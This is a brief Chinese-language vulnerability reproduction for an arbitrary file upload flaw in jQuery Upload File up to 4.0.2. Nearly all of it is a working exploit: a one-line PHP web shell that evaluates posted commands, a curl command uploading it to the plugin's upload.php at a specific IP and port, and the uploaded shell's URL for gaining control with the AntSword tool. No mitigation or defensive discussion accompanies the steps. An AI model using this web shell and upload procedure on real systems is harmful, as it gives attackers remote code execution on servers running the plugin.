漏洞描述
jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。 jQuery Upload File <= 4.0.2 中的任意文件上传 根目录下/jquery-upload-file
漏洞复现
创建一句话木马文件
<?php @eval($_POST['cmd']);?>
使用命令上传到接口
curl -F "myfile=@shell.php" "http://10.95.14.161:39479//jquery-upload-file/php/upload.php"
蚁剑getshell
http://10.95.14.161:39479/jquery-upload-file/php/uploads/shell.php
若有收获,就点个赞吧